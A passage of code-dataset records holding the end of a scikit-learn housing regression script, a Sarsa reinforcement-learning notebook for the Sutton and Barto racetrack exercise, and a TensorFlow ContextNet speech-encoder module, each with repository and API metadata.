10], 'max_features': [2, 3, 4]}\n]\n\nforest_reg = RandomForestRegressor()\n\ngrid_search = GridSearchCV(forest_reg, param_grid, cv=5, scoring='neg_mean_squared_error')\ngrid_search.fit(housing_prepared, housing_labels)\nprint(grid_search.best_params_)\nprint(grid_search.best_estimator_)\ncvres = grid_search.cv_results_\nfor mean_score, params in zip(cvres['mean_test_score'], cvres['params']):\n print(np.sqrt(-mean_score), params)\n\nfeature_importances = grid_search.best_estimator_.feature_importances_\nprint(feature_importances)\nextra_attribs = ['rooms_per_hhold', 'pop_per_hhold', 'bedrooms_per_rooms']\ncat_one_hot_attribs = list(encoder.classes_)\nattributes = num_attribs + extra_attribs + cat_one_hot_attribs\nsorted(zip(feature_importances))\n\nfinal_model = grid_search.best_estimator_\n\nX_test = strat_test_set.drop(\"median_house_value\", axis=1)\nY_test = strat_test_set[\"median_house_value\"].copy()\n\nX_test_prepared = full_pipeline.transform(X_test)\n\nfinal_predictions = final_model.predict(X_test_prepared)\nfinal_mse = mean_squared_error(Y_test, final_predictions)\nfinal_rmse = np.sqrt(final_mse)\ndisplay_scores(final_rmse)\n", "repo_name": "higornucci/classificacao-aulas", "sub_path": "handson/housing.py", "file_name": "housing.py", "file_ext": "py", "file_size_in_byte": 11301, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "53", "api": [{"api_name": "warnings.filterwarnings", "line_number": 21, "usage_type": "call"}, {"api_name": "pandas.set_option", "line_number": 23, "usage_type": "call"}, {"api_name": "pandas.set_option", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 26, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 28, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 29, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 29, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 30, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 30, "usage_type": "name"}, {"api_name": "sklearn.base.BaseEstimator", "line_number": 35, "usage_type": "name"}, {"api_name": "sklearn.base.TransformerMixin", "line_number": 35, "usage_type": "name"}, {"api_name": "numpy.c_", "line_number": 47, "usage_type": "attribute"}, {"api_name": "numpy.c_", "line_number": 50, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 66, "usage_type": "call"}, {"api_name": "os.path", "line_number": 66, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 74, "usage_type": "call"}, {"api_name": "os.path", "line_number": 74, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 77, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 77, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 78, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 78, "usage_type": "name"}, {"api_name": "os.path.isdir", "line_number": 82, "usage_type": "call"}, {"api_name": "os.path", "line_number": 82, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 83, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 84, "usage_type": "call"}, {"api_name": "os.path", "line_number": 84, "usage_type": "attribute"}, {"api_name": "six.moves.urllib.request.urlretrieve", "line_number": 85, "usage_type": "call"}, {"api_name": "six.moves.urllib.request", "line_number": 85, "usage_type": "attribute"}, {"api_name": "six.moves.urllib", "line_number": 85, "usage_type": "name"}, {"api_name": "tarfile.open", "line_number": 86, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 92, "usage_type": "call"}, {"api_name": "os.path", "line_number": 92, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 93, "usage_type": "call"}, {"api_name": "numpy.ceil", "line_number": 113, "usage_type": "call"}, {"api_name": "sklearn.model_selection.StratifiedShuffleSplit", "line_number": 116, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 124, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 126, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.Imputer", "line_number": 187, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 193, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.LabelEncoder", "line_number": 195, "usage_type": "call"}, {"api_name": "future_encoders.OneHotEncoder", "line_number": 200, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.LabelBinarizer", "line_number": 204, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 211, "usage_type": "call"}, {"api_name": "sklearn.pipeline.Pipeline", "line_number": 219, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.Imputer", "line_number": 221, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.StandardScaler", "line_number": 223, "usage_type": "call"}, {"api_name": "future_encoders.ColumnTransformer", "line_number": 231, "usage_type": "call"}, {"api_name": "future_encoders.OneHotEncoder", "line_number": 233, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LinearRegression", "line_number": 241, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 251, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 252, "usage_type": "call"}, {"api_name": "sklearn.tree.DecisionTreeRegressor", "line_number": 255, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 258, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 259, "usage_type": "call"}, {"api_name": "sklearn.model_selection.cross_val_score", "line_number": 262, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 263, "usage_type": "call"}, {"api_name": "sklearn.ensemble.RandomForestRegressor", "line_number": 266, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 269, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 270, "usage_type": "call"}, {"api_name": "sklearn.model_selection.cross_val_score", "line_number": 272, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 273, "usage_type": "call"}, {"api_name": "sklearn.ensemble.RandomForestRegressor", "line_number": 281, "usage_type": "call"}, {"api_name": "sklearn.model_selection.GridSearchCV", "line_number": 283, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 289, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 306, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 307, "usage_type": "call"}]}
+{"seq_id": "34070809706", "text": "#!/usr/bin/env python\r\n# coding: utf-8\r\n\r\n# # Sutton and Barto Racetrack: Sarsa\r\n# Exercise 5.8 from *Reinforcement Learning: An Introduction* by Sutton and Barto.\r\n# \r\n# This notebook applies the **Sarsa** algorithm from Chapter 6 to the Racetrack problem from Chapter 5. \r\n# \r\n# Python Notebook by Patrick Coady: [Learning Artificial Intelligence](https://learningai.io/)\r\n\r\n# In[1]:\r\n\r\n\r\nimport numpy as np\r\nimport random\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\n# In[2]:\r\n\r\n\r\nclass RaceTrack(object):\r\n \"\"\"\r\n RaceTrack object maintains and updates the race track \r\n state. Interaction with the class is through\r\n the take_action() method. The take_action() method returns\r\n a successor state and reward (i.e. s' and r)\r\n\r\n The class constructor is given a race course as a list of \r\n strings. The constructor loads the course and initializes \r\n the environment state.\r\n \"\"\"\r\n\r\n def __init__(self, course):\r\n \"\"\"\r\n Load race course, set any min or max limits in the \r\n environment (e.g. max speed), and set initial state.\r\n Initial state is random position on start line with \r\n velocity = (0, 0).\r\n\r\n Args:\r\n course: List of text strings used to construct\r\n race-track.\r\n '+': start line\r\n '-': finish line\r\n 'o': track\r\n 'X': wall\r\n\r\n Returns:\r\n self\r\n \"\"\"\r\n self.NOISE = 0.0\r\n self.EPS = 0.1 # epsilon-greedy coefficient\r\n self.MAX_VELOCITY = 4\r\n self.start_positions = []\r\n self.course = None\r\n self._load_course(course)\r\n self._random_start_position()\r\n self.velocity = np.array([0, 0], dtype=np.int16)\r\n\r\n def take_action(self, action):\r\n \"\"\"\r\n Take action, return state' and reward\r\n\r\n Args:\r\n action: 2-tuple of requested change in velocity in x- and\r\n y-direction. valid action is -1, 0, +1 in each axis.\r\n\r\n Returns:\r\n reward: integer\r\n \"\"\"\r\n\r\n self._update_velocity(action)\r\n self._update_position()\r\n if self.is_terminal_state():\r\n return 100.0\r\n\r\n return -1.0\r\n\r\n def get_state(self):\r\n \"\"\"Return 2-tuple: (position, velocity). Each is a 2D numpy array.\"\"\"\r\n return self.position.copy(), self.velocity.copy()\r\n\r\n def _update_velocity(self, action):\r\n \"\"\"\r\n Update x- and y-velocity. Clip at 0 and self.MAX_VELOCITY\r\n\r\n Args:\r\n action: 2-tuple of requested change in velocity in x- and\r\n y-direction. valid action is -1, 0, +1 in each axis. \r\n \"\"\"\r\n if np.random.rand() > self.NOISE:\r\n self.velocity += np.array(action, dtype=np.int16)\r\n self.velocity = np.minimum(self.velocity, self.MAX_VELOCITY)\r\n self.velocity = np.maximum(self.velocity, 0)\r\n\r\n def reset(self):\r\n self._random_start_position()\r\n self.velocity = np.array([0, 0], dtype=np.int16)\r\n\r\n def _update_position(self):\r\n \"\"\"\r\n Update position based on present velocity. Check at fine time \r\n scale for wall or finish. If wall is hit, set position to random\r\n position at start line. If finish is reached, set position to \r\n first crossed point on finish line.\r\n \"\"\"\r\n for tstep in range(0, self.MAX_VELOCITY + 1):\r\n t = tstep / self.MAX_VELOCITY\r\n pos = self.position + np.round(self.velocity * t).astype(np.int16)\r\n if self._is_wall(pos):\r\n self._random_start_position()\r\n self.velocity = np.array([0, 0], dtype=np.int16)\r\n return\r\n if self._is_finish(pos):\r\n self.position = pos\r\n self.velocity = np.array([0, 0], dtype=np.int16)\r\n return\r\n self.position = pos\r\n\r\n def _random_start_position(self):\r\n \"\"\"Set car to random position on start line\"\"\"\r\n self.position = np.array(random.choice(self.start_positions),\r\n dtype=np.int16)\r\n\r\n def _load_course(self, course):\r\n \"\"\"Load course. Internally represented as numpy array\"\"\"\r\n y_size, x_size = len(course), len(course[0])\r\n self.course = np.zeros((x_size, y_size), dtype=np.int16)\r\n for y in range(y_size):\r\n for x in range(x_size):\r\n point = course[y][x]\r\n if point == 'o':\r\n self.course[x, y] = 1\r\n elif point == '-':\r\n self.course[x, y] = 0\r\n elif point == '+':\r\n self.course[x, y] = 2\r\n elif point == 'W':\r\n self.course[x, y] = -1\r\n # flip left/right so (0,0) is in bottom-left corner\r\n self.course = np.fliplr(self.course)\r\n for y in range(y_size):\r\n for x in range(x_size):\r\n if self.course[x, y] == 0:\r\n self.start_positions.append((x, y))\r\n\r\n def _is_wall(self, pos):\r\n \"\"\"Return True is position is wall\"\"\"\r\n return self.course[pos[0], pos[1]] == -1\r\n\r\n def _is_finish(self, pos):\r\n \"\"\"Return True if position is finish line\"\"\"\r\n return self.course[pos[0], pos[1]] == 2\r\n\r\n def is_terminal_state(self):\r\n \"\"\"Return True at episode terminal state\"\"\"\r\n return (self.course[self.position[0],\r\n self.position[1]] == 2)\r\n\r\n def action_to_tuple(self, a):\r\n \"\"\"Convert integer action to 2-tuple: (ax, ay)\"\"\"\r\n ax = a // 3 - 1\r\n ay = a % 3 - 1\r\n\r\n return ax, ay\r\n\r\n def tuple_to_action(self, a):\r\n \"\"\"Convert 2-tuple to integer action: {0-8}\"\"\"\r\n return int((a[0] + 1) * 3 + a[1] + 1)\r\n\r\n def greedy_eps(self, Q):\r\n \"\"\"Based on state and Q values, return epsilon-greedy action\"\"\"\r\n s = self.get_state()\r\n s_x, s_y = s[0][0], s[0][1]\r\n s_vx, s_vy = s[1][0], s[1][1]\r\n if np.random.rand() > self.EPS:\r\n print(Q[s_x, s_y, s_vx, s_vy, :, :])\r\n if (np.max(Q[s_x, s_y, s_vx, s_vy, :, :]) ==\r\n np.min(Q[s_x, s_y, s_vx, s_vy, :, :])):\r\n a = (0, 0)\r\n else:\r\n a = np.argmax(Q[s_x, s_y, s_vx, s_vy, :, :])\r\n a = np.unravel_index(a, (3, 3)) - np.array([1, 1])\r\n a = (a[0], a[1])\r\n else:\r\n a = self.action_to_tuple(random.randrange(9))\r\n\r\n return a\r\n\r\n def srts(self,Q):\r\n pass\r\n\r\n\r\n def state_action(self, s, a):\r\n \"\"\"Build state-action tuple for indexing Q NumPy array\"\"\"\r\n s_x, s_y = s[0][0], s[0][1]\r\n s_vx, s_vy = s[1][0], s[1][1]\r\n a_x, a_y = a[0] + 1, a[1] + 1\r\n s_a = (s_x, s_y, s_vx, s_vy, a_x, a_y)\r\n\r\n return s_a\r\n\r\n # In[3]:\r\n\r\n\r\n# Race Track from Sutton and Barto Figure 5.6\r\n\r\nbig_course = ['WWWWWWWWWWWWWWWWWW',\r\n 'WWWWooooooooooooo+',\r\n 'WWWoooooooooooooo+',\r\n 'WWWoooooooooooooo+',\r\n 'WWooooooooooooooo+',\r\n 'Woooooooooooooooo+',\r\n 'Woooooooooooooooo+',\r\n 'WooooooooooWWWWWWW',\r\n 'WoooooooooWWWWWWWW',\r\n 'WoooooooooWWWWWWWW',\r\n 'WoooooooooWWWWWWWW',\r\n 'WoooooooooWWWWWWWW',\r\n 'WoooooooooWWWWWWWW',\r\n 'WoooooooooWWWWWWWW',\r\n 'WoooooooooWWWWWWWW',\r\n 'WWooooooooWWWWWWWW',\r\n 'WWooooooooWWWWWWWW',\r\n 'WWooooooooWWWWWWWW',\r\n 'WWooooooooWWWWWWWW',\r\n 'WWooooooooWWWWWWWW',\r\n 'WWooooooooWWWWWWWW',\r\n 'WWooooooooWWWWWWWW',\r\n 'WWooooooooWWWWWWWW',\r\n 'WWWoooooooWWWWWWWW',\r\n 'WWWoooooooWWWWWWWW',\r\n 'WWWoooooooWWWWWWWW',\r\n 'WWWoooooooWWWWWWWW',\r\n 'WWWoooooooWWWWWWWW',\r\n 'WWWoooooooWWWWWWWW',\r\n 'WWWoooooooWWWWWWWW',\r\n 'WWWWooooooWWWWWWWW',\r\n 'WWWWooooooWWWWWWWW',\r\n 'WWWW------WWWWWWWW']\r\n\r\n# Tiny course for debug\r\n\r\ntiny_course = ['WWWWWW',\r\n 'Woooo+',\r\n 'Woooo+',\r\n 'WooWWW',\r\n 'WooWWW',\r\n 'WooWWW',\r\n 'WooWWW',\r\n 'W--WWW', ]\r\n\r\n# In[4]:\r\n\r\n\r\n# Problem Initialization\r\n\r\ncourse = big_course\r\nx_size, y_size = len(course[0]), len(course)\r\n# Q[x_pos, y_pos, x_velocity, y-velocity, x-acceleration, y-acceleration]\r\nQ = np.zeros((x_size, y_size, 5, 5, 3, 3), dtype=np.float64)\r\nposition_map = np.zeros((x_size, y_size), dtype=np.float64) # track explored positions\r\n\r\nN = 2000 # num episodes\r\ngamma = 1.0\r\nalpha = 0.1\r\ntrack = RaceTrack(course)\r\n\r\n# Sarsa\r\n\r\nepochs = []\r\ncounts = []\r\ncount = 0\r\nfor e in range(N):\r\n if (e + 1) % 200 == 0: print('Episode {}'.format(e + 1))\r\n track.reset()\r\n s = track.get_state()\r\n a = track.greedy_eps(Q)\r\n\r\n while not track.is_terminal_state():\r\n position_map[s[0][0], s[0][1]] += 1\r\n count += 1\r\n r = track.take_action(a)\r\n s_prime = track.get_state()\r\n a_prime = track.greedy_eps(Q)\r\n s_a = track.state_action(s, a)\r\n s_a_prime = track.state_action(s_prime, a_prime)\r\n Q[s_a] = Q[s_a] + alpha * (r + gamma * Q[s_a_prime] - Q[s_a])\r\n s, a = s_prime, a_prime\r\n epochs.append(e)\r\n counts.append(count)\r\n\r\n\r\n\r\n\r\n\r\n# In[5]:\r\n\r\n\r\nplt.plot(epochs, counts)\r\nplt.title('Simulation Steps vs. Episodes')\r\nplt.xlabel('Epochs')\r\nplt.ylabel('Total Simulation Steps')\r\nplt.show()\r\n\r\n# In[6]:\r\n\r\n\r\nprint('Heat map of position exploration:')\r\nplt.imshow(np.flipud(position_map.T), cmap='hot', interpolation='nearest')\r\nplt.show()\r\n\r\n# In[7]:\r\n\r\n\r\n# Convert Q (action-values) to pi (policy)\r\npi = np.zeros((x_size, y_size, 5, 5), dtype=np.int16)\r\nfor idx in np.ndindex(x_size, y_size, 5, 5):\r\n a = np.argmax(Q[idx[0], idx[1], idx[2], idx[3], :, :])\r\n a = np.unravel_index(a, (3, 3))\r\n pi[idx] = track.tuple_to_action(a - np.array([1, 1]))\r\n\r\n# In[8]:\r\n\r\n\r\n# Run learned policy on test case\r\n\r\npos_map = np.zeros((x_size, y_size))\r\ntrack.reset()\r\nfor e in range(1000):\r\n s = track.get_state()\r\n s_x, s_y = s[0][0], s[0][1]\r\n s_vx, s_vy = s[1][0], s[1][1]\r\n pos_map[s_x, s_y] += 1 # exploration map\r\n act = track.action_to_tuple(pi[s_x, s_y, s_vx, s_vy])\r\n track.take_action(act)\r\n if track.is_terminal_state(): break\r\n\r\nprint('Sample trajectory on learned policy:')\r\npos_map = (pos_map > 0).astype(np.float32)\r\npos_map += track.course # overlay track course\r\nplt.imshow(np.flipud(pos_map.T), cmap='hot', interpolation='nearest')\r\nplt.show()\r\n\r\n", "repo_name": "AnikHawk/AI-Lab", "sub_path": "Arc Consistency/SRTS.py", "file_name": "SRTS.py", "file_ext": "py", "file_size_in_byte": 10785, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.array", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.int16", "line_number": 59, "usage_type": "attribute"}, {"api_name": "numpy.random.rand", "line_number": 92, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 92, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 93, "usage_type": "call"}, {"api_name": "numpy.int16", "line_number": 93, "usage_type": "attribute"}, {"api_name": "numpy.minimum", "line_number": 94, "usage_type": "call"}, {"api_name": "numpy.maximum", "line_number": 95, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 99, "usage_type": "call"}, {"api_name": "numpy.int16", "line_number": 99, "usage_type": "attribute"}, {"api_name": "numpy.round", "line_number": 110, "usage_type": "call"}, {"api_name": "numpy.int16", "line_number": 110, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 113, "usage_type": "call"}, {"api_name": "numpy.int16", "line_number": 113, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 117, "usage_type": "call"}, {"api_name": "numpy.int16", "line_number": 117, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 123, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 123, "usage_type": "call"}, {"api_name": "numpy.int16", "line_number": 124, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 129, "usage_type": "call"}, {"api_name": "numpy.int16", "line_number": 129, "usage_type": "attribute"}, {"api_name": "numpy.fliplr", "line_number": 142, "usage_type": "call"}, {"api_name": "numpy.random.rand", "line_number": 177, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 177, "usage_type": "attribute"}, {"api_name": "numpy.max", "line_number": 179, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 180, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 183, "usage_type": "call"}, {"api_name": "numpy.unravel_index", "line_number": 184, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 184, "usage_type": "call"}, {"api_name": "random.randrange", "line_number": 187, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 262, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 262, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 263, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 263, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 301, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 301, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 302, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 302, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 303, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 303, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 304, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 304, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 305, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 305, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 311, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 311, "usage_type": "name"}, {"api_name": "numpy.flipud", "line_number": 311, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 312, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 312, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 318, "usage_type": "call"}, {"api_name": "numpy.int16", "line_number": 318, "usage_type": "attribute"}, {"api_name": "numpy.ndindex", "line_number": 319, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 320, "usage_type": "call"}, {"api_name": "numpy.unravel_index", "line_number": 321, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 322, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 329, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 341, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 343, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 343, "usage_type": "name"}, {"api_name": "numpy.flipud", "line_number": 343, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 344, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 344, "usage_type": "name"}]}
+{"seq_id": "44030322090", "text": "from typing import List\nimport tensorflow as tf\n\nfrom tensorflow_asr.utils import math_util\n\nL2 = tf.keras.regularizers.l2(1e-6)\n\n\ndef get_activation(\n activation: str = \"silu\",\n):\n activation = activation.lower()\n if activation in [\"silu\", \"swish\"]:\n return tf.nn.swish\n elif activation == \"relu\":\n return tf.nn.relu\n elif activation == \"linear\":\n return tf.keras.activations.linear\n else:\n raise ValueError(\"activation must be either 'silu', 'swish', 'relu' or 'linear'\")\n\n\nclass Reshape(tf.keras.layers.Layer):\n def call(self, inputs):\n return math_util.merge_two_last_dims(inputs)\n\n\nclass ConvModule(tf.keras.layers.Layer):\n def __init__(\n self,\n kernel_size: int = 3,\n strides: int = 1,\n filters: int = 256,\n activation: str = \"silu\",\n kernel_regularizer=None,\n bias_regularizer=None,\n **kwargs,\n ):\n super(ConvModule, self).__init__(**kwargs)\n self.strides = strides\n self.conv = tf.keras.layers.SeparableConv1D(\n filters=filters,\n kernel_size=kernel_size,\n strides=strides,\n padding=\"same\",\n depthwise_regularizer=kernel_regularizer,\n pointwise_regularizer=kernel_regularizer,\n bias_regularizer=bias_regularizer,\n name=f\"{self.name}_conv\",\n )\n self.bn = tf.keras.layers.BatchNormalization(name=f\"{self.name}_bn\")\n self.activation = get_activation(activation)\n\n def call(\n self,\n inputs,\n training=False,\n **kwargs,\n ):\n outputs = self.conv(inputs, training=training)\n outputs = self.bn(outputs, training=training)\n outputs = self.activation(outputs)\n return outputs\n\n\nclass SEModule(tf.keras.layers.Layer):\n def __init__(\n self,\n kernel_size: int = 3,\n strides: int = 1,\n filters: int = 256,\n activation: str = \"silu\",\n kernel_regularizer=None,\n bias_regularizer=None,\n **kwargs,\n ):\n super(SEModule, self).__init__(**kwargs)\n self.conv = ConvModule(\n kernel_size=kernel_size,\n strides=strides,\n filters=filters,\n activation=activation,\n kernel_regularizer=kernel_regularizer,\n bias_regularizer=bias_regularizer,\n name=f\"{self.name}_conv_module\",\n )\n self.activation = get_activation(activation)\n self.fc1 = tf.keras.layers.Dense(filters // 8, name=f\"{self.name}_fc1\")\n self.fc2 = tf.keras.layers.Dense(filters, name=f\"{self.name}_fc2\")\n\n def call(\n self,\n inputs,\n training=False,\n **kwargs,\n ):\n features, input_length = inputs\n outputs = self.conv(features, training=training)\n\n se = tf.divide(tf.reduce_sum(outputs, axis=1), tf.expand_dims(tf.cast(input_length, dtype=outputs.dtype), axis=1))\n se = self.fc1(se, training=training)\n se = self.activation(se)\n se = self.fc2(se, training=training)\n se = self.activation(se)\n se = tf.nn.sigmoid(se)\n se = tf.expand_dims(se, axis=1)\n\n outputs = tf.multiply(outputs, se)\n return outputs\n\n\nclass ConvBlock(tf.keras.layers.Layer):\n def __init__(\n self,\n nlayers: int = 3,\n kernel_size: int = 3,\n filters: int = 256,\n strides: int = 1,\n residual: bool = True,\n activation: str = \"silu\",\n alpha: float = 1.0,\n kernel_regularizer=None,\n bias_regularizer=None,\n **kwargs,\n ):\n super(ConvBlock, self).__init__(**kwargs)\n\n self.dmodel = filters\n self.time_reduction_factor = strides\n filters = int(filters * alpha)\n\n self.convs = []\n for i in range(nlayers - 1):\n self.convs.append(\n ConvModule(\n kernel_size=kernel_size,\n strides=1,\n filters=filters,\n activation=activation,\n kernel_regularizer=kernel_regularizer,\n bias_regularizer=bias_regularizer,\n name=f\"{self.name}_conv_module_{i}\",\n )\n )\n\n self.last_conv = ConvModule(\n kernel_size=kernel_size,\n strides=strides,\n filters=filters,\n activation=activation,\n kernel_regularizer=kernel_regularizer,\n bias_regularizer=bias_regularizer,\n name=f\"{self.name}_conv_module_{nlayers - 1}\",\n )\n\n self.se = SEModule(\n kernel_size=kernel_size,\n strides=1,\n filters=filters,\n activation=activation,\n kernel_regularizer=kernel_regularizer,\n bias_regularizer=bias_regularizer,\n name=f\"{self.name}_se\",\n )\n\n self.residual = None\n if residual:\n self.residual = ConvModule(\n kernel_size=kernel_size,\n strides=strides,\n filters=filters,\n activation=\"linear\",\n kernel_regularizer=kernel_regularizer,\n bias_regularizer=bias_regularizer,\n name=f\"{self.name}_residual\",\n )\n\n self.activation = get_activation(activation)\n\n def call(\n self,\n inputs,\n training=False,\n **kwargs,\n ):\n features, input_length = inputs\n outputs = features\n for conv in self.convs:\n outputs = conv(outputs, training=training)\n outputs = self.last_conv(outputs, training=training)\n input_length = math_util.get_reduced_length(input_length, self.last_conv.strides)\n outputs = self.se([outputs, input_length], training=training)\n if self.residual is not None:\n res = self.residual(features, training=training)\n outputs = tf.add(outputs, res)\n outputs = self.activation(outputs)\n return outputs, input_length\n\n\nclass ContextNetEncoder(tf.keras.Model):\n def __init__(\n self,\n blocks: List[dict] = [],\n alpha: float = 1.0,\n kernel_regularizer=None,\n bias_regularizer=None,\n **kwargs,\n ):\n super(ContextNetEncoder, self).__init__(**kwargs)\n\n self.reshape = Reshape(name=f\"{self.name}_reshape\")\n\n self.blocks = []\n for i, config in enumerate(blocks):\n self.blocks.append(\n ConvBlock(\n **config,\n alpha=alpha,\n kernel_regularizer=kernel_regularizer,\n bias_regularizer=bias_regularizer,\n name=f\"{self.name}_block_{i}\",\n )\n )\n\n def call(\n self,\n inputs,\n training=False,\n **kwargs,\n ):\n outputs, input_length = inputs\n outputs = self.reshape(outputs)\n for block in self.blocks:\n outputs, input_length = block([outputs, input_length], training=training)\n return outputs\n", "repo_name": "TensorSpeech/TensorFlowASR", "sub_path": "tensorflow_asr/models/encoders/contextnet.py", "file_name": "contextnet.py", "file_ext": "py", "file_size_in_byte": 7082, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 877, "dataset": "github-code", "pt": "53", "api": [{"api_name": "tensorflow.keras.regularizers.l2", "line_number": 6, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 6, "usage_type": "attribute"}, {"api_name": "tensorflow.nn", "line_number": 14, "usage_type": "attribute"}, {"api_name": "tensorflow.nn", "line_number": 16, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 18, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 23, "usage_type": "attribute"}, {"api_name": "tensorflow_asr.utils.math_util.merge_two_last_dims", "line_number": 25, "usage_type": "call"}, {"api_name": "tensorflow_asr.utils.math_util", "line_number": 25, "usage_type": "name"}, {"api_name": "tensorflow.keras", "line_number": 28, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.SeparableConv1D", "line_number": 41, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 41, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.BatchNormalization", "line_number": 51, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 51, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 66, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 88, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 88, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 89, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 89, "usage_type": "attribute"}, {"api_name": "tensorflow.divide", "line_number": 100, "usage_type": "call"}, {"api_name": "tensorflow.reduce_sum", "line_number": 100, "usage_type": "call"}, {"api_name": "tensorflow.expand_dims", "line_number": 100, "usage_type": "call"}, {"api_name": "tensorflow.cast", "line_number": 100, "usage_type": "call"}, {"api_name": "tensorflow.nn.sigmoid", "line_number": 105, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 105, "usage_type": "attribute"}, {"api_name": "tensorflow.expand_dims", "line_number": 106, "usage_type": "call"}, {"api_name": "tensorflow.multiply", "line_number": 108, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 112, "usage_type": "attribute"}, {"api_name": "tensorflow_asr.utils.math_util.get_reduced_length", "line_number": 191, "usage_type": "call"}, {"api_name": "tensorflow_asr.utils.math_util", "line_number": 191, 